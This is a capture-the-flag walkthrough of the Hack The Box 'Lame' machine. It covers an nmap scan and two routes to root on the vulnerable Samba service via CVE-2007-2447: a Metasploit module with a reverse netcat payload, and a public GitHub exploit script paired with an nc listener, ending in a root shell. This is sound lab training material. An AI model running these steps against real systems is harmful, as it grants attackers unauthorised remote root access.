
# Lame writeup



## nmap 
initial recon using nmap 

```
$ sudo nmap -sC -sV -O 10.10.10.3     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 19:27 CEST
Nmap scan report for 10.10.10.3
Host is up (0.024s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.22 (92%), Linux 2.6.8 - 2.6.30 (92%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d02h57m07s, deviation: 2h49m44s, median: -3d04h57m09s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-10-10T08:30:33-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds

```

### foothold and root with metasploit
using msfconsol and the `exploits/multi/samba/user_map` getting root was just running a script on port 139 which is vulnerable.

This yields a root remote execution

```
msf5 exploit(multi/samba/usermap_script) > show options                                                                                                                                                                                    
                                                                                                                                                                                                                                           
Module options (exploit/multi/samba/usermap_script):                                                                                                                                                                                       
                                                                                                                                                                                                                                           
   Name    Current Setting  Required  Description                                                                                                                                                                                          
   ----    ---------------  --------  -----------                                                                                                                                                                                          
   RHOSTS  10.10.10.3       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                                                                                                                   
   RPORT   139              yes       The target port (TCP)                                                                                                                                                                                
                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
Payload options (cmd/unix/reverse_netcat):                                                                                                                                                                                                 
                                                                                                                                                                                                                                           
   Name   Current Setting  Required  Description                                                                                                                                                                                           
   ----   ---------------  --------  -----------                                                                                                                                                                                           
   LHOST  10.10.14.15      yes       The listen address (an interface may be specified)                                                                                                                                                    
   LPORT  4444             yes       The listen port                                                                                                                                                                                       
                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
Exploit target:                                                                                                                                                                                                                            
                                                                                                                                                                                                                                           
   Id  Name                                                                                                                                                                                                                                
   --  ----                                                                                                                                                                                                                                
   0   Automatic                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
msf5 exploit(multi/samba/usermap_script) > run                                                                                                                                                                                             
                                                           
```


### foothold and root without metasploit
We know the name of the exploit and by googling `samba usermap exploit github` this repo shows up `https://github.com/amriunix/CVE-2007-2447`.

by cloning the repo and running it with the remote and local host(along with netcat) we gain root:

```

$ python3 usermap_script.py 10.10.10.3 445 10.10.14.15 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

```


```
$ sudo nc -lnvp 4444                                                                                               
[sudo] password for kali:                                                                                            
listening on [any] 4444 ...                                                                                          
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.3] 58726                                                           
ls                                                        
bin                                                       
boot                                                      
cdrom                                                     
dev                                                       
etc                                                       
home                                                      
initrd                                                    
initrd.img                                                
lib                                                       
lost+found                                                
media                                                     
mnt                                                       
nohup.out                                                 
opt                                                       
proc                                                      
root                                                      
sbin                                                      
srv                                                       
sys                                                       
tmp                                                       
usr                                                       
var                                                       
vmlinuz                                                   
whoami                                                    
root 
```
